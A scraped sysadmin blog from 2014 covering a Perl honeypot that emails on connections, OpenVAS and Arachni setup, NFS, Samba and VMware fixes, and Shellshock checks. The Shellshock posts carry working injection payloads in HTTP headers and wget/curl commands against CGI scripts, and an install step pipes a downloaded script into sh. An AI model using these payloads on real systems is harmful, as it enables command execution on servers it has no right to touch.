on an ubuntu 14.04 lts server...
# apt-get install build-essential mail-utils perl
run cpan get the following cpan dependencies:
# cpan
> install Net::DNS
> install Net::Server
> install YAML
> install MIME::Lite::TT
> install Data::Dumper
> install Getopt::Long
> install Net::IP::Match::Regexp
> exit
place perl script and conf in /usr/local/bin/honey or wherever
do a little ln action.
# ln -s /usr/local/honey/honey.conf /etc/honey.conf
set background to 1 in honey.conf to make it turn into a background process.
and... when putting in your ports, if any ports happen to be open when
honey.pl is called, honey.pl will die.
figure them out?
# netstat -tpln
speaking of which look at the honey.conf below, we're going to be opening
a scad of ports. tune the system:
# ulimit -n 70000
# echo "32768 65535" >/proc/sys/net/ipv4/ip_local_port_range
test it
# perl -c honey.pl should return 'OK'
start with
# perl /usr/local/honey.pl --config /etc/honey.conf
if running via /etc/rc.local :
# chmod +x /etc/rc.local
add the line before exit 0:
perl /usr/local/honey.pl --config /etc/honey.conf
##########
# honey.pl
#!/usr/bin/perl
# version 1.3
package Honey;
use MIME::Lite::TT;
use Net::DNS;
use strict;
use warnings;
use Data::Dumper;
use base qw(Net::Server::PreForkSimple);
use YAML;
use Getopt::Long;
use Net::IP::Match::Regexp qw( create_iprange_regexp match_ip );
sub logger($);
my $configfile = "./honey.conf";
GetOptions ("config=s" => \$configfile);
my ($hashref, $arrayref, $string) = YAML::LoadFile( $configfile );
print Dumper($hashref);
my %config = %$hashref;
#############################
### CONFIG
#############################
my $from_email = $config{'from_email'};
my $subject = $config{'subject'};
my $to_email = $config{'to_email'};
my $mailserver = $config{'mailserver'};
my $mail_thres = $config{'mail_thres'};
my $tempfolder = $config{'tempfolder'};
my $lp_ref = $config{'listenports'};
my $background = $config{'background'};
my $ih_ref = $config{'ignorehosts'};
my $logpath = $config{'logpath'};
unless ( 1 &&
defined($from_email) &&
defined($subject) &&
defined($to_email) &&
defined($mailserver) &&
defined($mail_thres) &&
defined($tempfolder) &&
defined($lp_ref) &&
defined($background) &&
defined($ih_ref) &&
1 ) {
die "invalid configuration\n";
}
unless (defined($logpath)) {
print STDERR "No logpath given, will default to /var/log/honey.log";
$logpath = "/var/log/honey.log";
}
logger("honey init");
#############################
### VARS
#############################
my ($i);
my @lports = @$lp_ref;
my @ih = split(",",$ih_ref);
my $ignorehosts = create_iprange_regexp(@ih);
my $tempcache = $tempfolder . "honeycache";
my $tempports = $tempfolder . "honeyports";
my $template = <<TEMPLATE;
Unauthorized connection noted \n\r
Connection details: [% connection_string %] \n\r
Source details: [% srcip %] ([% srcip_dns %]) \n\r
Timestamp: [% timestamp %]
TEMPLATE
############################################
sub post_accept {
#print STDERR "post accept in $$\n";
}
sub process_request {
my $self = shift;
#print STDERR "process request in $$\n";
my $connection_info = $self->{'server'}->{'peeraddr'} . ":" . $self->{'server'}->{'peerport'};
$connection_info = $connection_info . " --> " . $self->{'server'}->{'sockaddr'} . ":" . $self->{'server'}->{'sockport'};
connection_identified( $self->{'server'}->{'peeraddr'}, $connection_info);
}
sub connection_identified ($$) {
my $srcIP = $_[0];
my $connection_info = $_[1];
logger("ok we got a connection from $srcIP");
# RESTORE HASH
my $ref = restore_hash();
my %last_email_timestamp = %$ref;
my $skip_email = 0;
# check if we should ignore this IP
if (match_ip($srcIP, $ignorehosts)) {
logger("ignoring $srcIP!");
$skip_email = 1;
return 0;
}
# email max every $mail_thres secs
my $current_timestamp = time();
if (defined($last_email_timestamp{$srcIP})) {
logger("We have already seen a connection from the host before");
my $diff = $current_timestamp - $last_email_timestamp{$srcIP};
if ( $diff < $mail_thres) {
logger("OK so we saw a connection less than $mail_thres secs ago .. skippin email");
$skip_email = 1;
} else {
logger("but it was a long time ago, diff is $diff");
}
} else {
logger("we have not seen this IP before");
}
$last_email_timestamp{$srcIP} = $current_timestamp;
save_hash(\%last_email_timestamp);
if ($skip_email) { return; };
logger("ok gonna send an email using $mailserver, timeout 60");
# reverse dns
my $srcip_dns = PTR_lookup($srcIP);
# timestamp
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time);
my $timestamp = sprintf("%4d-%02d-%02d %02d:%02d:%02d\n",$year+1900,$mon+1,$mday,$hour,$min,$sec);
# SEND EMAIL?
my %params;
$params{connection_string} = $connection_info;
$params{srcip_dns} = $srcip_dns;
$params{srcip} = $srcIP;
$params{timestamp} = $timestamp;
my $msg = MIME::Lite::TT->new(
From => $from_email,
To => $to_email,
Subject => $subject,
Template => \$template,
TmplParams => \%params,
);
$msg->send('smtp', $mailserver, Timeout => 60 );
logger("email sent using $mailserver");
}
sub PTR_lookup {
my $tname = shift;
my $type = "Reverse (PTR)";
my $rr;
my $res = new Net::DNS::Resolver;
my $query = $res->query("$tname","PTR");
if ($query) {
foreach $rr ($query->answer) {
next unless $rr->type eq "PTR";
my $ip = $rr->ptrdname;
return ($ip);
}
} else {
my $logstring = "Reverse lookup query failed for $tname : " . $res->errorstring . "\n";
logger($logstring);
return ($tname);
}
}
sub restore_hash() {
my %thash = ();
if (-e $tempcache) {
open(FOO,"<$tempcache") or die;
foreach my $line (<FOO>) {
chomp($line);
my ($ip,$time) = split(":",$line);
$thash{$ip} = $time;
}
close(FOO);
}
return \%thash;
}
sub save_hash($) {
my $hash_ref = $_[0];
my %thash = %$hash_ref;
open(FOO,">$tempcache") or die;
foreach my $key (keys %thash) {
if (defined($thash{$key})) {
print FOO $key . ":" . $thash{$key} . "\n";
}
}
close(FOO);
}
sub logger($) {
my $message = $_[0];
# LOG
open(POO,">>$logpath") or die;
print POO get_date() . ": $message\n";
close(POO);
# STDERR
print STDERR get_date() . ": $message\n";
}
sub get_date () {
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time);
my $timestamp = sprintf("%4d-%02d-%02d %02d:%02d:%02d\n",$year+1900,$mon+1,$mday,$hour,$min,$sec);
chop($timestamp);
return $timestamp;
}
open(FOO,">$tempports") or die;
foreach my $lport (@lports) {
if ($lport =~ /(\d+)-(\d+)/) {
my $startport = $1;
my $stopport = $2;
if ($stopport < $startport) { die "Invalid config, check the range\n"; };
for ($i=$startport;$i<=$stopport;$i++) {
print FOO "port $i\n";
}
} elsif ($lport =~ /^(\d+)/) {
print FOO "port $lport\n";
} else {
logger("Invalid port $lport specified");
}
}
close(FOO);
if ($background) {
Honey->run( background => 1,
conf_file => "$tempports");
} else {
Honey->run(conf_file => "$tempports");
}
##########
# honey.conf
from_email: me@here
to_email: you@there
mailserver: smtpserver
ignorehosts: 10.10.10.10, 0.0.0.0
mail_thres: 60
tempfolder: /tmp/
subject: Unauthorized connection to knockknock
background: 1
logpath: /var/log/honeylog.log
listenports:
- 1-21
- 23-24
- 26-65500
Friday, December 19, 2014
knock know who's there?
sometimes you just want to set up a virtual system to see if there are any scans going on your network.
apache logs to syslog
the other day i flipped out. well, flipped out in my own quiet way. i heard about some apache access issues and it gave me a slight headache.
the super cool thing about linux boxes is that the "truth is in the logs". and i heart logs and log aggregation.
the cool thing about apache is that if configured correctly it will log all access and all errors. sadly, apache, by default, writes its logs on the local system and not via syslog processes. crap.
i really really don't want to go to each of my boxes and grep through /var/log/apache/blah.txt, how do i throw the logs access the network?
well, most linux boxes have tee and logger. tee is a nice program that basically say, do this and this. logger can send arbitrary data to syslog. yay.
in my enabled site, i changed my ErrorLog and CustomLog sections from this:
since i'm using rsyslogd, i edited my /etc/rsyslog.d/50-default conf to pipe off my logs to my remote syslog server:
reload your daemons and voila.
the cool thing about apache is that if configured correctly it will log all access and all errors. sadly, apache, by default, writes its logs on the local system and not via syslog processes. crap.
i really really don't want to go to each of my boxes and grep through /var/log/apache/blah.txt, how do i throw the logs access the network?
well, most linux boxes have tee and logger. tee is a nice program that basically say, do this and this. logger can send arbitrary data to syslog. yay.
in my enabled site, i changed my ErrorLog and CustomLog sections from this:
ErrorLog /var/log/apache2/error.log CustomLog /var/log/apache2/access.log combinedto this:
ErrorLog "|/usr/bin/tee -a /var/log/apache2/error.log | /usr/bin/logger -thttpd -plocal6.err" CustomLog "|/usr/bin/tee -a /var/log/apache2/access.log | /usr/bin/logger -thttpd -plocal6.notice" combinedi'm calling local6 and sending it off to syslog in httpd format. neat.
since i'm using rsyslogd, i edited my /etc/rsyslog.d/50-default conf to pipe off my logs to my remote syslog server:
auth,authpriv.*;local6.* @remotesyslogserverif you'd rather not log to /var/log/syslog, add: local6.none to the -/var/log/messages stanza.
reload your daemons and voila.
Wednesday, December 17, 2014
openvas v7 create a new user
well. there are so many ways to create a user. this allows for integration with greenbone security desktop; a scanner user.
root@openvas:~# openvasmd --create-user younotme User created with password 'd25d4c66-5f7a-4156-84ee-f3ee101381fa'. root@openvas:~# openvasmd --user=younotme --new-password=notcreatedherethat was easy.
Monday, December 8, 2014
create a user via commandline in osx
create a local user with local user group in macos x
list existing local gids:
# dscl . -list /Groups PrimaryGroupID | awk '{print $2}' | sort -n
for new group, choose numeric id not in list; above 1000 is good.
# dscl . -create /Groups/localgroup
# dscl . -create /Groups/localgroup PrimaryGroupID 1001
did you press enter?
# dscl . -read /Groups/localgroup
AppleMetaNodeLocation: /Local/Default
GeneratedUID: 00A738DA-21B7-4CD2-B5D9-7873C77205D1
PrimaryGroupID: 1001
RecordName: localgroup
RecordType: dsRecTypeStandard:Groups
list existing local uids:
# dscl . -list /Users UniqueID | awk '{print $2}' | sort -n
for new user, choose numberic id not in lists; above 1000 is good.
# dscl . -create /Users/localuser
# dscl . -create /Users/localuser UserShell /bin/bash
# dscl . -create /Users/localuser RealName "Local Users"
# dscl . -create /Users/localuser UniqueID "1001"
# dscl . -create /Users/localuser PrimaryGroupID 1001
# dscl . -create /Users/localuser NFSHomeDirectory /Users/localuser
did you really do all that?
# dscl . -read /Users/localuser
AppleMetaNodeLocation: /Local/Default
NFSHomeDirectory: /Users/localuser
GeneratedUID: 47D6D841-C7F1-4962-9F7E-167E8BFC3A91
PrimaryGroupID: 1001
RealName: localuser
RecordName: localuser
RecordType: dsRecTypeStandard:Users
UniqueID: 1001
UserShell: /usr/bash
create home directory.
# mkdir /Users/localuser
# chown localuser:localgroup /Users/localuser
give localuser a password:
# password localuser
# su - localuser
$
neat!
Friday, December 5, 2014
netapp exports and hate
i have a netapp on premises.
it has a couple vfilers. i wanted to create an additional vfiler. sadly, i couldn't. hate. i hate.
i created a volume and i needed to make it have special non-nfsv4 settings cause that's just how the world goes.
but! for whatever reason the netapp won't let me edit /etc/exports via a mount on a management host. it just won't.
so, here's what you do, and you'll see what this is a pain.
ssh root@freakonetapp
rdfile /etc/exports
(and out spits a lot of stuff)
/vol/crap -sec=sys,rw,root=10.6.6.66,nosuid
/vol/crap2 -sec=sys,rw,root=10.6.6.66,nosuid
i need to change /vol/crap2 and add yet another management host.
so, copy all the lines that spit out on the screen. make your spiffy changes on an editor somewhere and issue:
wrfile /etc/export
(copy your spiffy changes you had in an editor elsewhere)
/vol/crap -sec=sys,rw,root=10.6.6.66,nosuid
#/vol/crap2 -sec=sys,rw,root=10.6.6.66,nosuid
/unix-crap -actual=/vol/crap2,sec=sys,rw,root=10.6.6.66:10.6.66.6,nosuid
Ctrl-C
And reexport nfs:
exportfs -a
Thursday, December 4, 2014
am i slob or am i lazy? let's find -exec chown
le sigh. LE SIGH. sometimes people like to do things on their own out of expediency or
because their local sysadmin is a lazy lazy lazy slob.
i'm not a slob.
the issue was that someonenotme updated ubuntu and nfs was broke. or rather,
their home dir wasn't mounted.
this had been the case for months.
sure, i could put this line in /etc/fstab and go my merry way:
slobberserver:/home /home nfs rsize=8192,wsize=8192,soft,_netdev 0 0
but, i'm not a slob.
see that _netdev? that's an awesome directive that says, "hey linuxbox
do not mount me till the network stack it up". awesome.
here's what you do:
record someonenotme's local system uid & gid
# id someonenotme
uid=1000(someonenotme) gid=1000(someonenotme)
kill all someonenotme processes
# kill -9 `ps -ef|grep someonenotme| awk '{print $2}'`
really really?
# lsof |grep someonenotme
... nada ...
ldap & nfs-ize the system
# apt-get install nscd autofs ldap-client
put all your specially conf'd ldap conf files in /etc
refresh the name service
# /etc/init.d/nscd restart
# id someonenotme
uid=15288(someonenotme) gid=101(someonenotme) groups=100(users)
edit passwd and change someonenotme's uid and gid to that in ldap.
oh, and make sure the homedir matches, too.
# vipasswd
now we change all the uids and gids so that someonenotme matches what we have in ldap.
to prevent an unfun time, first umount all nfs mounts of interest.
# umount /home
now we look and change:
# find / -uid 1000 -gid 1000 -exec chown 15288:101 {} \;
after this is complete, mount -a and go about your business.
but wait! you cd'd into their dir, didn't you? you saw they've done stuff as root
in the past. crud. why did you ls -la?
# find /home/someonenotme -uid 0 -gid 0 -exec chown 15288:101 {} \;
still not a slob.
Tuesday, November 25, 2014
tell me lies
go ahead. work.
# apt-get install libnss-ldap ldap-utils libsasl2-modules-gssapi-mit heimdal-clients libpam-heimdal # ldapsearch -h server you.there.com
Monday, November 17, 2014
splunk revelations and dayquil
i am taking dayquil today and somehow i decided to no longer like splunk's nag screen and to no longer like splunk's check for updates feature.
oh splunk. i love you. but i hate you. i want you to be free, but life is never that nice, is it?
here're some useful things for me and me alone.
remove splunk trial notifications
sure, splunk is free to use with < 500mb/day.
by default has a notification at the top of the gui offering a for-pay license. To remove it,
2 lines need to be commented. change this lines in:
/opt/splunk/lib/python2.5/site-packages/splunk/appserver/oxiclean/SearchService.py:
{{{
# nagware D) if the user is using a free version of the software -- nag them constantly on every page!
if (licenseInfo.find(".//product") != None):
productVersion = licenseInfo.find(".//product").text
#logger.debug("this is a %s server" % productVersion )
if (productVersion == "free"):
self.setSystemError("nagwareTime", cli_common.getUILiteral("FREE_VERSION_NAGWARE_STRING") )
}}}
to:
{{{
# nagware D) if the user is using a free version of the software -- nag them constantly on every page!
if (licenseInfo.find(".//product") != None):
productVersion = licenseInfo.find(".//product").text
#logger.debug("this is a %s server" % productVersion )
# if (productVersion == "free"):
# self.setSystemError("nagwareTime", cli_common.getUILiteral("FREE_VERSION_NAGWARE_STRING") )
}}}
do not get smart and do this:
# nagware E) if the user is using a free version of the software -- nag them constantly on every page!
#logger.debug("checking for nagware state E")
if (licenseInfo.find(".//type") != None):
productType = licenseInfo.find(".//type").text
#logger.debug("this is a %s license" % productType )
if (productType == "trial"):
# timeRemainingMessage, licenseState = self.getLicenseTimeRemainingString(licenseInfo)
# self.setSystemError("nagwareTime", timeRemainingMessage )
removing splunk update check
when splunk starts it looks for updates. stop that, okay?
change this line in:
/opt/splunk/etc/system/default/web.conf
updateCheckerBaseURL = http://quickdraw.splunk.com/js/
to:
updateCheckerBaseURL = 0
howto have splunk listen to arbitrary ports
if UDP/TCP 514 are defined in inputs, obviously a daemon running as a not root-user is unable to open these socket connections.
to open socket connections for these and any other... run splunk as root (say it ain't so).
or use iptables and redirect to whereever splunk is listening. gross.
or edit syslog's conf file to plop all traffic somewhere and have splunk snarf it up. logrotate. eh.
Thursday, November 13, 2014
Thursday, October 30, 2014
script for centos 7 & openvas 7 install
centos 7 minimal. as in minimal. as in not even has netstat.
yum update yum install wget yum install isomd5sum wget -q -O - http://www.atomicorp.com/installers/atomic |sh yum -y install openvas openvas-setup systemctl stop firewalld systemctl disable firewalld openvas-mkcert-client -n om -i openvasmd --rebuild openvasmd restart all daemons. tell me sweet lies about arachni, will you? wget http://downloads.arachni-scanner.com/arachni-0.4.6-0.4.3-linux-x86_64.tar.gz tar xzvf arachni-0.4.6-0.4.3-linux-x86_64.tar.gz mv arachni-0.4.6-0.4.3 /usr/local/. ln -s /usr/local/arachni-0.4.6-0.4.3 /usr/local/arachni ln -s /usr/local/arachni/bin/arachni* /usr/bin/ ln -s /usr/local/arachni/bin/readlink_f.sh /usr/bin/
Thursday, October 23, 2014
will grep for food
although zless does the job, too.
so. my mx host changed. and you know a whole lot of my boxes simply do not not use smarthost for mail relay. that's okay. or is it?
not really. because all those hosts need to have their zillion hosts files and bizarro mail conf files updated. and of course i'm not using chef or puppet or using anything sane. who would do that? not me, of course.
but! i do backup etc directories in a central, safe place. i can totally grep them, right? no. they're all compressed.
zless to the rescue!
and then, knowing the tgz i can rgrep the snot out of it and find where that string resides. go to said server and grep -r away.
so. my mx host changed. and you know a whole lot of my boxes simply do not not use smarthost for mail relay. that's okay. or is it?
not really. because all those hosts need to have their zillion hosts files and bizarro mail conf files updated. and of course i'm not using chef or puppet or using anything sane. who would do that? not me, of course.
but! i do backup etc directories in a central, safe place. i can totally grep them, right? no. they're all compressed.
zless to the rescue!
#!/bin/bash
cd /safe/archive
for i in $( ls |grep tgz ); do
echo $i >> busted
zless $i | grep oldmailhost >> busted
done
and then, knowing the tgz i can rgrep the snot out of it and find where that string resides. go to said server and grep -r away.
Wednesday, October 15, 2014
i get tired of paths
i do.
cd /usr/local && tar --strip-components 1 -xzf \
/path/to/crap-<version>-<platform>-<arch>.tar.gz
plops in local. libs, binaries and all.
openvas & nasl
openvas-nasl -d -t mysystem.oh.no -X -T out /var/lib/openvas/plugins/gb_bash_shellshock_remote_cmd_exec_vuln.nasl
openvas-nasl -d -t 192.168.6.0/24 -X -T out /var/lib/openvas/plugins/gb_bash_shellshock_remote_cmd_exec_vuln.nasl set key www/80/keepalive -> yes
esx 5 pubkeys
To allow SSH access to ESXi/ESX hosts with public/private key authentication:
Generate public/private keys.
Notes
These instructions generate two files in ~/.ssh: id_rsa and id_rsa.pub.
In ESXi 5.x, the ssh-keygen command is located at /usr/lib/vmware/openssh/bin.
On the remote host, store the public key content, id_rsa.pub in ~/.ssh/authorized_keys.
Notes
For ESXi 5.0, the location of authorized_keys is: /etc/ssh/keys-<username>/authorized_keys
More than one key can be stored in this file.
To allow root access, changePermitRootLogin no to PermitRootLogin yes in the /etc/ssh/sshd_config file.
To disable password login, ensure thatChallengeResponseAuthentication and PasswordAuthentication are set to no.
Reload the service:
For ESXi, run the command:
/etc/init.d/SSH restart
For ESX, run the command:
service sshd reload
Monday, October 13, 2014
the shocker
sure... we have centralized everything. what we sysadmins do have are pubkeys all over the place. so how do we figure out how much of a pain patching for the many shellshock and aftershock systems that are on our networks?
well crap. first is enumerate. yank the dns zone files, clean them up and feed them into:
shocking.sh
#!/bin/bash
datestamp=$(date +"%m-%d-%Y")
for ip_addr in $(cat strippedzonefile) ; do
ping -q -c 1 $ip_addr &&
bash -c "
echo \" *** $ip_addr *** \" >> output ;
scp -B theshocker.sh root@$ip_addr:/root/ >> output ;
ssh -v -o ConnectTimeout=1 -o BatchMode=yes -o ConnectionAttempts=1 \
-o PasswordAuthentication=no root@$ip_addr \
/bin/bash -c /root/theshocker.sh >> output ;
echo \"done\"
"
done
cat output | mail -s "shellshock and aftershock report $datestamp" you@somewhere
#!/bin/sh
SHELLSHOCK=`env x='() { :;}; echo true' /bin/bash -c "" 2>/dev/null`
AFTERSHOCK=`env var='() {(a)=>\' /bin/bash -c "echo date | grep -v date" 2>/dev$`
if [ -n "$SHELLSHOCK" ]
then
echo "cve-2014-6271 vulnerability detected - shellshock";
else
echo "cve-2014-6271 not detected - shellshock"
fi
if [ -n "$AFTERSHOCK" ]
then
echo "cve-2014-7169 vulnerability detected - aftershock";
else
echo "cve-2014-7169 not detected - aftershock"
fi
*** 192.168.6.199 *** cve-2014-6271 vulnerability detected - shellshock cve-2014-7169 vulnerability detected - aftershock *** 192.168.6.20 *** *** 192.168.6.21 ***you get the picture.
zone file to happy ips
grep -E "192\.168\.(13[6-9]|14[0-2])\.[0-9]{1,3}" db.aname.zone | sort | uniq > finessed
Monday, September 29, 2014
thanks f5
GET / HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: () { :; }; ping -c 17 10.1.1.1
Host:() { :; }; ls -la
Referer: () { :; }; ping -c 23 10.1.1.1
Thursday, September 25, 2014
with a rusty spoon
well kids. this just sucks donkey balls.
get shell and issue:
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
it gets better. say you have cgi-bin enabled and not in perl taint mode. run this:
wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi
and better.
curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi
Wednesday, September 24, 2014
simple cpio script
rsync is fine. but seeding a directory first is better. i like to do this on local private networks with cpio because the compression and security aren't really a concern.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.
thus, a simple, recursive cpio script. for dumping a local directory to an nfs mount.
#!/bin/sh echo start "$(date)" >> /var/log/cpio.log ; find /home/ -depth -print0 | cpio -0pdumv /nfs/mount ; echo end "$(date)" >> /var/log/cpio.log ;
Wednesday, September 17, 2014
install gcc notes
1) Get the desired version from SVN, e.g. from svn://gcc.gnu.org/svn/gcc/tags/gcc_3_4_6_release
(To install SVN, see how to Work with SVN)
2) Check to make sure install.sh, config.sub and config.guess files are present in your gcc directory. If not, copy them into your unzipped gcc directory:
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/install-sh .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.sub .
me@there:~/tools/gcc> cp -p /usr/share/automake-1.9/config.guess .
3) Sample config for SUSE 10 Linux, x86_64
me@there:~/tools/gcc> mkdir objdir
me@there:~/tools/gcc> cd objdir
me@there:~/tools/gcc/objdir> ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local
--infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64
--enable-languages=c,c++,objc,fortran,java,ada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.0
--enable-ssp --disable-libssp --enable-java-awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib64
--with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --without-system-libunwind
--with-cpu=generic --host=x86_64-suse-linux
Instructions on how to install GCC can be found here: http://gcc.gnu.org/install/
or...
1) Search for an rpm package for your specific OS, e.g.:
http://rpm.pbone.net/index.php3/stat/3/srodzaj/1/search/gcc34
2) You can make a symbolic link to the newly uploaded gcc in /usr/bin
Wednesday, August 27, 2014
Tuesday, August 26, 2014
samba & static wins entries
yes. you need to think about this from time to time.
Static WINS Entries
Adding static entries to your Samba WINS server is actually fairly easy. All you have to do is add a
line to wins.dat, typically located in /usr/local/samba/var/locks or /var/run/samba.
Entries in wins.dat take the form of:
"NAME#TYPE" TTL ADDRESS+ FLAGS
where NAME is the NetBIOS name, TYPE is the NetBIOS type, TTL is the time-to-live as an absolute
time in seconds, ADDRESS+ is one or more addresses corresponding to the registration, and FLAGS
are the NetBIOS flags for the registration.
A change that has been made to the wins.dat will not take effect until nmbd has been restarted.
It should be noted that since the wins.dat file changes dynamically, nmbd should be stopped before editing
this file. Do not forget to restart nmbd when this file has been edited.
A typical dynamic entry looks like this:
"MADMAN#03" 1155298378 192.168.1.2 66R
To make a NetBIOS name static (permanent), simply set the TTL to 0, like this:
"MADMAN#03" 0 192.168.1.2 66R
The NetBIOS flags may be interpreted as additive hexadecimal values:
00 - Broadcast node registration
20 - Peer node registration
40 - Meta node registration
60 - Hybrid node registration
02 - Permanent name
04 - Active name
80 - Group name.
The 'R' indicates this is a registration record.
Thus 66R means: Hybrid node active and permanent NetBIOS name. These values may be found in the
nameserv.h header file from the Samba source code repository. These are the values for the NB flags.
nameserv.h
92 /* The wins flags. Looks like the nbflags ! */
93 #define WINS_UNIQUE 0x00 /* Unique record */
94 #define WINS_NGROUP 0x01 /* Normal Group eg: 1B */
95 #define WINS_SGROUP 0x02 /* Special Group eg: 1C */
96 #define WINS_MHOMED 0x03 /* MultiHomed */
97
98 #define WINS_ACTIVE 0x00 /* active record */
99 #define WINS_RELEASED 0x04 /* released record */
100 #define WINS_TOMBSTONED 0x08 /* tombstoned record */
101 #define WINS_DELETED 0x0C /* deleted record */
102
103 #define WINS_STATE_MASK 0x0C
104
105 #define WINS_LOCAL 0x00 /* local record */
106 #define WINS_REMOTE 0x10 /* remote record */
107
108 #define WINS_BNODE 0x00 /* Broadcast node */
109 #define WINS_PNODE 0x20 /* PtP node */
110 #define WINS_MNODE 0x40 /* Mixed node */
111 #define WINS_HNODE 0x60 /* Hybrid node */
112
113 #define WINS_NONSTATIC 0x00 /* dynamic record */
114 #define WINS_STATIC 0x80 /* static record */
Friday, August 22, 2014
finding orphaned vmware templates or vmtx hell
what happens when templates and parent directories haven't consistent names or reside in
directories that share the same name, and of course, are all over the place? you sigh.
then you "open the book". and when i say "open the book" i mean it the way
the portuguese mean it. think sailor talk, only worse.
vmware isn't very nice in that via vsphere you can't figure out where your "assets" reside.
that's *okay*. gui fail.
various powershell cli scripts are losers, too. what you need to do is actually query
the sql db that the vcenter uses.
so, off i go to vmware's support site; and i find this:
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2004139
COOL. install more junk on my system. since this is running sql server 2008 express,
i get this:
http://www.microsoft.com/en-us/download/details.aspx?id=7593
flock. i go through the totally non-intuitive install for sql server 2008 studio express.
just install "a new instance". you're not really installing sql server 2008. i cancelled
when i saw that under installation. i read up. and the i went for it. no worries.
and then you run the tool.
of course you've kept the name of your db and passwords handy, right?
well, if you went with the vmware defaults, just to a network browse, connect to your
local sql server express db. it should look like: YOUR_VCENTER\VIM_SQLEXP
and do local auth. it is okay.
you run this query that vmware support gave you:
select VPX_ENTITY.NAME as "VM Name", VPX_VM.FILE_NAME as "File Name / Path"
From VPX_VM inner join VPX_Entity
where VPX_VM.FILE_NAME LIKE '%VMNAME%'
on vpx_vm.ID = vpx_entity.ID
order by VPX_entity.name;
it barfs. holy heck. re-write the query and get expected results:
use VIM_VCDB;
select VPX_ENTITY.NAME as "VM Name", VPX_VM.FILE_NAME as "File Name / Path"
From VPX_VM inner join VPX_Entity
on vpx_vm.ID = vpx_entity.ID
order by VPX_entity.name;
and there you go. of course the datastores are completely unfriendly,
but you can ssh into your client boxes and figure it out pretty quick.
of course you can.
go get some coffee. you're awesome.
Tuesday, August 12, 2014
old linux box old samba join old
Adding a Linux domain member machine
configure the smb.conf file with all happiness. Include workgroup, authentication via domain, etc.
check if config is nifty fine:
% testparm
to check if ldap auth via nsswitch is okay, execute:
%getent passwd
%getent group
join the domain:
% net rpc testjoin -S 'PDC' -U Administrator%yesyes
% net rpc join -U Administrator%oreilly
if errors abound, may need in smb.conf:
client schannel = no
or... just do it again.
afterwards, check if all is fine:
% smbclient -L localhostname
it should show something like:
Anonymous login successful
Domain=[ONTHEPHONE] OS=[Unix] Server=[Samba 3.0.22]
Sharename Type Comment
--------- ---- -------
ADMIN$ IPC IPC Service (bollocks server (Samba 3.0.22))
IPC$ IPC IPC Service (bollocks server (Samba 3.0.22))
localtest Disk testing in /usr/local
Anonymous login successful
Domain=[ONTHEPHONE] OS=[Unix] Server=[Samba 3.0.22]
Server Comment
--------- -------
FARMINGTON bollocks server (Samba 3.0.22)
PDC onthephone server (Samba 3.0.11)
Workgroup Master
--------- -------
ONTHEPHONE PDC
If the server is a BDC, do not forget to:
% smbpasswd -w
Monday, August 11, 2014
oh the humanity or updating intel nic drivers on esxi 5.5.0
yeah. fun stuff. so vmware, too lazy to update your isos? search through the archives for the correct async ones and unpack the archive and upload the thing called offline-bundle and then scp up to an esxi host - be sure to have ssh service running, is that what you're telling me to do? okay.
~ # esxcli software vib install -d /vmfs/volumes/yes-local/isos/igb-5.2.5-offline_bundle-1682588.zip Installation Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: Intel_bootbank_net-igb_5.2.5-1OEM.550.0.0.1331820 VIBs Removed: VMware_bootbank_net-igb_5.0.5.1.1-1vmw.550.1.15.1623387
Wednesday, August 6, 2014
ubuntu 9.04 sources.list
jaunty is my friend. it does unfs.
/etc/apt/sources.list deb http://old-releases.ubuntu.com/ubuntu/ jaunty main restricted deb http://old-releases.ubuntu.com/ubuntu/ jaunty-updates main restricted deb http://old-releases.ubuntu.com/ubuntu/ jaunty universe deb http://old-releases.ubuntu.com/ubuntu/ jaunty-updates universe deb http://old-releases.ubuntu.com/ubuntu/ jaunty multiverse deb http://old-releases.ubuntu.com/ubuntu/ jaunty-updates multiverse deb http://old-releases.ubuntu.com/ubuntu/ jaunty-security main restricted deb http://old-releases.ubuntu.com/ubuntu/ jaunty-security universe deb http://old-releases.ubuntu.com/ubuntu/ jaunty-security multiverse
Friday, August 1, 2014
manually umount and mount an nfs volume on esx 5.5
vmware esxi 5.5 says the nfs volume is not accessible. really?
esxcli storage list
yep. not accessible.
esxcli storage nfs remove -v nfs-store
remove it. do whatever you do to fix the issue. then... re-add per below.
esxcli storage nfs add -H 192.168.6.66 -s /data/dev/nfs-store -v nfs-store
^ ^ ^
| | |
nfs server | |
nfs export |
local datastore name
Tuesday, July 29, 2014
sigh. i want to rotate this silly svn logs. i put it with the apache2 conf file, because, well, it is controlled by apache.
i could totally add more in the first stanza but... the perms are off. root adm is not www-data www-data
/var/log/apache2/*.log {
weekly
missingok
rotate 52
compress
delaycompress
notifempty
create 640 root adm
sharedscripts
postrotate
/etc/init.d/apache2 reload > /dev/null
endscript
prerotate
if [ -d /etc/logrotate.d/httpd-prerotate ]; then \
run-parts /etc/logrotate.d/httpd-prerotate; \
fi; \
endscript
}
/var/svn/logs/*.log /var/svn/logs/svn_logfile {
weekly
missingok
rotate 52
notifempty
create 640 www-data www-data
sharedscripts
postrotate
/etc/init.d/apache2 reload > /dev/null
endscript
compress
notifempty
}
Monday, July 28, 2014
double mint gum or svn please give me something useful
